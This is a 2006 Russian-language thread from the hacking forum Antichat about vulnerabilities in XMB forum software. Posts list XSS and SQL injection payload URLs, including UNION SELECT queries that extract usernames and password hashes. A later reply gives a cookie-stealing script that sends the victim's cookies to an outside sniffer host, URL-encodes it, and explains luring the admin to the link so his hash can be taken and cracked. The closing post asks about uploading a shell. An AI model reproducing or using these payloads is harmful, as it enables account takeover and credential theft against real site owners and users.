Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Есть ли уязвимости у Xmb ? |

12.07.2006, 13:17
|
|
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме: 247533
Репутация:
4
|
|
Есть ли уязвимости у Xmb ?
Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
если не увидел чего .. ткните носом
|
|
|

12.07.2006, 13:19
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме: 7670961
Репутация:
1034
|
|
Форум просто не сильнопопулярный по этому особо нечего и нет....
Я поищу если что найду стоящие то выложу....
Тебя какие версий интересуют ?
|
|
|

14.07.2006, 05:46
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме: 172569
Репутация:
11
|
|
[CODE]Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.
Программа: XMB 1.9.3, возможно более ранние версии
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
Программа: XMB Forum 1.9.3 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[host]/u2u.php?action=send&username=
Код:
Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518)
Опасность: Средняя
Наличие эксплоита: Да
Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение.
Пример/Эксплоит:
http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
(document.cookie);</%73cript>
http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
</%73cript>
http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
(document.cookie);</%73cript>
http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
(document.cookie);</%73cript>
http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
(document.cookie);</%73cript>
http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
(document.cookie);</%73cript>
http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
(document.cookie);</%73cript>
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2
http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL
SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
LIMIT 1/*
http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
NULL,NULL,password FROM xmb_members WHERE uid=1
LIMIT 1/*
Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta
Опасность: Средняя
Наличие эксплоита: Да
Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
Пример/Эксплоит:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9
http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,
1%20LIMIT%201%20/*
http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>
http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>
http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>
htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>
http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>
http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>
Программа: XMB Forum 1.9.1
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей.
Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Это ещё не все
Код:
http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
в иксМБ много иксс! Можно спокойно мд5 угнать 
Последний раз редактировалось Azazel; 14.07.2006 в 10:39..
|
|
|

14.07.2006, 07:08
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме: 1593567
Репутация:
354
|
|
на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .
|
|
|

14.07.2006, 08:28
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме: 172569
Репутация:
11
|
|
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
А какой запрос делать чтобы хэш увидеть у первого id ??
|
|
|

14.07.2006, 09:40
|
|
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме: 247533
Репутация:
4
|
|
вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу
|
|
|

14.07.2006, 11:43
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме: 172569
Репутация:
11
|
|
Возможно нет вслудуйщей мне кажеться залатают дыру
|
|
|

14.07.2006, 12:15
|
|
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме: 247533
Репутация:
4
|
|
да кстати версия которая меня интерисует 1.9.5
а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации
|
|
|

14.07.2006, 13:47
|
|
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме: 172569
Репутация:
11
|
|
Зарегайся на форуме и проверь xss
Код:
http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>
если алерт пашет то пиши в ПМ админу типа чё за косяк
Код:
http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Есть в инете специальные скрипты
но можно немного скрипт сниффа приныкать но можно лучше сныкать
Код:
http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь  Кстати ПС
тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог
http://antichat.ru/sniff/log.php
Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет  Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3
|
|
|

17.07.2006, 10:32
|
|
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме: 247533
Репутация:
4
|
|
в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|